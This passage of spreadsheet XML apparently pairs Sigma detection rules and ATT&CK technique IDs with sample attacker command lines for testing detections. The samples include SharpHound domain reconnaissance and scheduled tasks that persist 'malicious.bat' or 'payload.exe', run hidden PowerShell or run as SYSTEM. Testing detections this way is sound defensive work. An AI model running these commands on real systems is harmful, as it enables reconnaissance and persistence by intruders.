      <c r="E3868" s="43" t="inlineStr">
        <is>
          <t>SharpHound.exe -CollectionMethod All -OutputDirectory C:\Temp --NoSaveCache</t>
        </is>
      </c>
      <c r="F3868" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3868" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3868" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3868" s="43" t="n"/>
      <c r="J3868" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3868" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3869" ht="15.75" customHeight="1" s="42">
      <c r="A3869" s="43" t="inlineStr">
        <is>
          <t>t1087.001</t>
        </is>
      </c>
      <c r="B3869" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_bloodhound_sharphound</t>
        </is>
      </c>
      <c r="C3869" s="43" t="inlineStr">
        <is>
          <t>HackTool - Bloodhound/Sharphound Execution</t>
        </is>
      </c>
      <c r="D3869" s="43" t="inlineStr">
        <is>
          <t>f376c8a7-a2d0-4ddc-aa0c-16c17236d962</t>
        </is>
      </c>
      <c r="E3869" s="43" t="inlineStr">
        <is>
          <t>SharpHound.exe -CollectionMethod All -OutputDirectory C:\Temp --NoSaveCache -JsonFolder C:\Temp -ZipFileName C:\Temp\data.zip</t>
        </is>
      </c>
      <c r="F3869" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3869" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3869" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3869" s="43" t="n"/>
      <c r="J3869" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3869" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3870" ht="15.75" customHeight="1" s="42">
      <c r="A3870" s="43" t="inlineStr">
        <is>
          <t>t1087.001</t>
        </is>
      </c>
      <c r="B3870" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_bloodhound_sharphound</t>
        </is>
      </c>
      <c r="C3870" s="43" t="inlineStr">
        <is>
          <t>HackTool - Bloodhound/Sharphound Execution</t>
        </is>
      </c>
      <c r="D3870" s="43" t="inlineStr">
        <is>
          <t>f376c8a7-a2d0-4ddc-aa0c-16c17236d962</t>
        </is>
      </c>
      <c r="E3870" s="43" t="inlineStr">
        <is>
          <t>SharpHound.exe -CollectionMethod All -OutputDirectory C:\Temp --NoSaveCache -JsonFolder C:\Temp -ZipFileName C:\Temp\data.zip -PortScanTimeout 1000</t>
        </is>
      </c>
      <c r="F3870" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3870" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3870" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3870" s="43" t="n"/>
      <c r="J3870" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3870" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3871" ht="15.75" customHeight="1" s="42">
      <c r="A3871" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B3871" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C3871" s="43" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D3871" s="43" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E3871" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /TN EvilTask /TR "calc.exe" /SC WEEKLY /D MON /ST 08:00</t>
        </is>
      </c>
      <c r="F3871" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3871" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3871" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3871" s="43" t="n"/>
      <c r="J3871" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3871" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3872" ht="15.75" customHeight="1" s="42">
      <c r="A3872" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B3872" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C3872" s="43" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D3872" s="43" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E3872" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /TN "WinUpdateTask" /TR "powershell -NoProfile -NonInteractive -WindowStyle Hidden -Command \"Write-Host 'Test'\"" /SC ONLOGON</t>
        </is>
      </c>
      <c r="F3872" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3872" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3872" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3872" s="43" t="n"/>
      <c r="J3872" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3872" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3873" ht="15.75" customHeight="1" s="42">
      <c r="A3873" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B3873" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_appdata_local_system</t>
        </is>
      </c>
      <c r="C3873" s="43" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Execution AppData Folder</t>
        </is>
      </c>
      <c r="D3873" s="43" t="inlineStr">
        <is>
          <t>c5c00f49-b3f9-45a6-997e-cfdecc6e1967</t>
        </is>
      </c>
      <c r="E3873" s="43" t="inlineStr">
        <is>
          <t>schtasks /Create /TN "UpdateTask" /TR "payload.exe" /SC ONSTART /RU S-1-5-18</t>
        </is>
      </c>
      <c r="F3873" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3873" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3873" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3873" s="43" t="n"/>
      <c r="J3873" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3873" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3874" ht="15.75" customHeight="1" s="42">
      <c r="A3874" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B3874" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_change</t>
        </is>
      </c>
      <c r="C3874" s="43" t="inlineStr">
        <is>
          <t>Suspicious Modification Of Scheduled Tasks</t>
        </is>
      </c>
      <c r="D3874" s="43" t="inlineStr">
        <is>
          <t>1c0e41cd-21bb-4433-9acc-4a2cd6367b9b</t>
        </is>
      </c>
      <c r="E3874" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe /C /TN "UpdateTask" /TR "notepad.exe"</t>
        </is>
      </c>
      <c r="F3874" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3874" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3874" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3874" s="43" t="n"/>
      <c r="J3874" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3874" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3875" ht="15.75" customHeight="1" s="42">
      <c r="A3875" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B3875" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_change</t>
        </is>
      </c>
      <c r="C3875" s="43" t="inlineStr">
        <is>
          <t>Suspicious Modification Of Scheduled Tasks</t>
        </is>
      </c>
      <c r="D3875" s="43" t="inlineStr">
        <is>
          <t>1c0e41cd-21bb-4433-9acc-4a2cd6367b9b</t>
        </is>
      </c>
      <c r="E3875" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe /Change /TN "UpdateTask" /TR "C:\Windows\System32\notepad.exe"</t>
        </is>
      </c>
      <c r="F3875" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3875" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3875" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3875" s="43" t="n"/>
      <c r="J3875" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3875" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3876" ht="15.75" customHeight="1" s="42">
      <c r="A3876" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B3876" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_change</t>
        </is>
      </c>
      <c r="C3876" s="43" t="inlineStr">
        <is>
          <t>Suspicious Modification Of Scheduled Tasks</t>
        </is>
      </c>
      <c r="D3876" s="43" t="inlineStr">
        <is>
          <t>1c0e41cd-21bb-4433-9acc-4a2cd6367b9b</t>
        </is>
      </c>
      <c r="E3876" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe /Change /TN "UpdateTask" /TR "notepad.exe" /F</t>
        </is>
      </c>
      <c r="F3876" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3876" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3876" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3876" s="43" t="n"/>
      <c r="J3876" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3876" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3877" ht="15.75" customHeight="1" s="42">
      <c r="A3877" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B3877" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_creation</t>
        </is>
      </c>
      <c r="C3877" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE</t>
        </is>
      </c>
      <c r="D3877" s="43" t="inlineStr">
        <is>
          <t>92626ddd-662c-49e3-ac59-f6535f12d189</t>
        </is>
      </c>
      <c r="E3877" s="43" t="inlineStr">
        <is>
          <t>schtasks  /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "Atomic task" /TR "C:\windows\system32\cmd.exe" /SC daily /ST 20:10</t>
        </is>
      </c>
      <c r="F3877" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3877" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3877" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3877" s="43" t="n"/>
      <c r="J3877" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3877" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3878" ht="15.75" customHeight="1" s="42">
      <c r="A3878" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B3878" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_creation</t>
        </is>
      </c>
      <c r="C3878" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE</t>
        </is>
      </c>
      <c r="D3878" s="43" t="inlineStr">
        <is>
          <t>92626ddd-662c-49e3-ac59-f6535f12d189</t>
        </is>
      </c>
      <c r="E3878" s="43" t="inlineStr">
        <is>
          <t>schtasks  /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10</t>
        </is>
      </c>
      <c r="F3878" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3878" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3878" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3878" s="43" t="n"/>
      <c r="J3878" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3878" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3879" ht="15.75" customHeight="1" s="42">
      <c r="A3879" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B3879" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_creation</t>
        </is>
      </c>
      <c r="C3879" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE</t>
        </is>
      </c>
      <c r="D3879" s="43" t="inlineStr">
        <is>
          <t>92626ddd-662c-49e3-ac59-f6535f12d189</t>
        </is>
      </c>
      <c r="E3879" s="43" t="inlineStr">
        <is>
          <t>schtasks  /Create /TN "CompMgmtBypass" /TR "compmgmt.msc" /SC ONLOGON /RL HIGHEST /F</t>
        </is>
      </c>
      <c r="F3879" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3879" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3879" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3879" s="43" t="n"/>
      <c r="J3879" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3879" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3880" ht="15.75" customHeight="1" s="42">
      <c r="A3880" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B3880" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_creation</t>
        </is>
      </c>
      <c r="C3880" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE</t>
        </is>
      </c>
      <c r="D3880" s="43" t="inlineStr">
        <is>
          <t>92626ddd-662c-49e3-ac59-f6535f12d189</t>
        </is>
      </c>
      <c r="E3880" s="43" t="inlineStr">
        <is>
          <t>schtasks  /Create /TN "EventViewerBypass" /TR "eventvwr.msc" /SC ONLOGON /RL HIGHEST /F</t>
        </is>
      </c>
      <c r="F3880" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3880" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3880" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3880" s="43" t="n"/>
      <c r="J3880" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3880" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3881" ht="15.75" customHeight="1" s="42">
      <c r="A3881" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B3881" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_creation</t>
        </is>
      </c>
      <c r="C3881" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE</t>
        </is>
      </c>
      <c r="D3881" s="43" t="inlineStr">
        <is>
          <t>92626ddd-662c-49e3-ac59-f6535f12d189</t>
        </is>
      </c>
      <c r="E3881" s="43" t="inlineStr">
        <is>
          <t>schtasks  /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"</t>
        </is>
      </c>
      <c r="F3881" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3881" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3881" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3881" s="43" t="n"/>
      <c r="J3881" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3881" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3882" ht="15.75" customHeight="1" s="42">
      <c r="A3882" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B3882" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_creation</t>
        </is>
      </c>
      <c r="C3882" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE</t>
        </is>
      </c>
      <c r="D3882" s="43" t="inlineStr">
        <is>
          <t>92626ddd-662c-49e3-ac59-f6535f12d189</t>
        </is>
      </c>
      <c r="E3882" s="43" t="inlineStr">
        <is>
          <t>schtasks  /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe"</t>
        </is>
      </c>
      <c r="F3882" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3882" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3882" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3882" s="43" t="n"/>
      <c r="J3882" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3882" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3883" ht="15.75" customHeight="1" s="42">
      <c r="A3883" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B3883" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_creation</t>
        </is>
      </c>
      <c r="C3883" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE</t>
        </is>
      </c>
      <c r="D3883" s="43" t="inlineStr">
        <is>
          <t>92626ddd-662c-49e3-ac59-f6535f12d189</t>
        </is>
      </c>
      <c r="E3883" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe 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F3883" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3883" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3883" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3883" s="43" t="n"/>
      <c r="J3883" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3883" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3884" ht="15.75" customHeight="1" s="42">
      <c r="A3884" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B3884" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_creation</t>
        </is>
      </c>
      <c r="C3884" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE</t>
        </is>
      </c>
      <c r="D3884" s="43" t="inlineStr">
        <is>
          <t>92626ddd-662c-49e3-ac59-f6535f12d189</t>
        </is>
      </c>
      <c r="E3884" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe /create /tn "test" /tr "cmd.exe" /f</t>
        </is>
      </c>
      <c r="F3884" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3884" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3884" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3884" s="43" t="n"/>
      <c r="J3884" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3884" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3885" ht="15.75" customHeight="1" s="42">
      <c r="A3885" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B3885" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_creation_temp_folder</t>
        </is>
      </c>
      <c r="C3885" s="43" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation Involving Temp Folder</t>
        </is>
      </c>
      <c r="D3885" s="43" t="inlineStr">
        <is>
          <t>39019a4e-317f-4ce3-ae63-309a8c6b53c5</t>
        </is>
      </c>
      <c r="E3885" s="43" t="inlineStr">
        <is>
          <t>C:\\Temp\\ewtask.sys /create /sc once</t>
        </is>
      </c>
      <c r="F3885" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3885" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3885" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3885" s="43" t="n"/>
      <c r="J3885" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3885" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3886" ht="15.75" customHeight="1" s="42">
      <c r="A3886" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B3886" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_creation_temp_folder</t>
        </is>
      </c>
      <c r="C3886" s="43" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation Involving Temp Folder</t>
        </is>
      </c>
      <c r="D3886" s="43" t="inlineStr">
        <is>
          <t>39019a4e-317f-4ce3-ae63-309a8c6b53c5</t>
        </is>
      </c>
      <c r="E3886" s="43" t="inlineStr">
        <is>
          <t>C:\Temp\ewtask.sys /create /sc once /tn "TestTask"</t>
        </is>
      </c>
      <c r="F3886" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3886" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3886" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3886" s="43" t="n"/>
      <c r="J3886" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3886" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3887" ht="15.75" customHeight="1" s="42">
      <c r="A3887" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B3887" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_creation_temp_folder</t>
        </is>
      </c>
      <c r="C3887" s="43" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation Involving Temp Folder</t>
        </is>
      </c>
      <c r="D3887" s="43" t="inlineStr">
        <is>
          <t>39019a4e-317f-4ce3-ae63-309a8c6b53c5</t>
        </is>
      </c>
      <c r="E3887" s="43" t="inlineStr">
        <is>
          <t>C:\Temp\ewtask.sys /create /sc once /f</t>
        </is>
      </c>
      <c r="F3887" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3887" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3887" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3887" s="43" t="n"/>
      <c r="J3887" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3887" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3888" ht="15.75" customHeight="1" s="42">
      <c r="A3888" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B3888" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_env_folder</t>
        </is>
      </c>
      <c r="C3888" s="43" t="inlineStr">
        <is>
          <t>Schedule Task Creation From Env Variable Or Potentially Suspicious Path Via Schtasks.EXE</t>
        </is>
      </c>
      <c r="D3888" s="43" t="inlineStr">
        <is>
          <t>81325ce1-be01-4250-944f-b4789644556f</t>
        </is>
      </c>
      <c r="E3888" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe /create /tn "BypassTask" /tr "C:\Users\Public\malicious.bat"</t>
        </is>
      </c>
      <c r="F3888" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3888" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3888" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3888" s="43" t="n"/>
      <c r="J3888" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3888" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3889" ht="15.75" customHeight="1" s="42">
      <c r="A3889" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B3889" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_env_folder</t>
        </is>
      </c>
      <c r="C3889" s="43" t="inlineStr">
        <is>
          <t>Schedule Task Creation From Env Variable Or Potentially Suspicious Path Via Schtasks.EXE</t>
        </is>
      </c>
      <c r="D3889" s="43" t="inlineStr">
        <is>
          <t>81325ce1-be01-4250-944f-b4789644556f</t>
        </is>
      </c>
      <c r="E3889" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe /create /tn "BypassTask" /tr "C:\Users\Default\malicious.bat"</t>
        </is>
      </c>
      <c r="F3889" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3889" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3889" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3889" s="43" t="n"/>
      <c r="J3889" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3889" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3890" ht="15.75" customHeight="1" s="42">
      <c r="A3890" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B3890" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_env_folder</t>
        </is>
      </c>
      <c r="C3890" s="43" t="inlineStr">
        <is>
          <t>Schedule Task Creation From Env Variable Or Potentially Suspicious Path Via Schtasks.EXE</t>
        </is>
      </c>
      <c r="D3890" s="43" t="inlineStr">
        <is>
          <t>81325ce1-be01-4250-944f-b4789644556f</t>
        </is>
      </c>
      <c r="E3890" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe /create /tn "BypassTask" /tr "C:\Users\AppData\Roaming\malicious.bat"</t>
        </is>
      </c>
      <c r="F3890" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3890" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3890" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3890" s="43" t="n"/>
      <c r="J3890" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3890" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3891" ht="15.75" customHeight="1" s="42">
      <c r="A3891" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B3891" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_folder_combos</t>
        </is>
      </c>
      <c r="C3891" s="43" t="inlineStr">
        <is>
          <t>Schtasks From Suspicious Folders</t>
        </is>
      </c>
      <c r="D3891" s="43" t="inlineStr">
        <is>
          <t>8a8379b8-780b-4dbf-b1e9-31c8d112fefb</t>
        </is>
      </c>
      <c r="E3891" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe /create /tn "UpdateTask" /tr "malware.exe" /sc onlogon /ru SYSTEM</t>
        </is>
      </c>
      <c r="F3891" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3891" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3891" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3891" s="43" t="n"/>
      <c r="J3891" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3891" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3892" ht="15.75" customHeight="1" s="42">
      <c r="A3892" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B3892" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_guid_task_name</t>
        </is>
      </c>
      <c r="C3892" s="43" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Name As GUID</t>
        </is>
      </c>
      <c r="D3892" s="43" t="inlineStr">
        <is>
          <t>ff2fff64-4cd6-4a2b-ba7d-e28a30bbe66b</t>
        </is>
      </c>
      <c r="E3892" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /SC ONLOGON /TN "{123e4567-e89b-12d3-a456-426614174000}" /TR "cmd.exe" /F</t>
        </is>
      </c>
      <c r="F3892" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3892" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3892" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3892" s="43" t="n"/>
      <c r="J3892" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3892" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3893" ht="15.75" customHeight="1" s="42">
      <c r="A3893" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B3893" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_guid_task_name</t>
        </is>
      </c>
      <c r="C3893" s="43" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Name As GUID</t>
        </is>
      </c>
      <c r="D3893" s="43" t="inlineStr">
        <is>
          <t>ff2fff64-4cd6-4a2b-ba7d-e28a30bbe66b</t>
        </is>
      </c>
      <c r="E3893" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /SC ONCE /TN 123e4567-e89b-12d3-a456-426614174000 /TR "cmd.exe" /F</t>
        </is>
      </c>
      <c r="F3893" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3893" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3893" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3893" s="43" t="n"/>
      <c r="J3893" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3893" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3894" ht="15.75" customHeight="1" s="42">
      <c r="A3894" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B3894" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_one_time_only_midnight_task</t>
        </is>
      </c>
      <c r="C3894" s="43" t="inlineStr">
        <is>
          <t>Uncommon One Time Only Scheduled Task At 00:00</t>
        </is>
      </c>
      <c r="D3894" s="43" t="inlineStr">
        <is>
          <t>970823b7-273b-460a-8afc-3a6811998529</t>
        </is>
      </c>
      <c r="E3894" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /ST 00:00 /SC ONCE /TN "UpdateTask" /TR "update.exe" /F</t>
        </is>
      </c>
      <c r="F3894" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3894" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3894" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3894" s="43" t="n"/>
      <c r="J3894" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3894" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3895" ht="15.75" customHeight="1" s="42">
      <c r="A3895" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B3895" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_openssh_tunnelling</t>
        </is>
      </c>
      <c r="C3895" s="43" t="inlineStr">
        <is>
          <t>Potential SSH Tunnel Persistence Install Using A Scheduled Task</t>
        </is>
      </c>
      <c r="D3895" s="43" t="inlineStr">
        <is>
          <t>2daa93a0-a5fb-41c5-8cd8-3c11294bfd1f</t>
        </is>
      </c>
      <c r="E3895" s="43" t="inlineStr">
        <is>
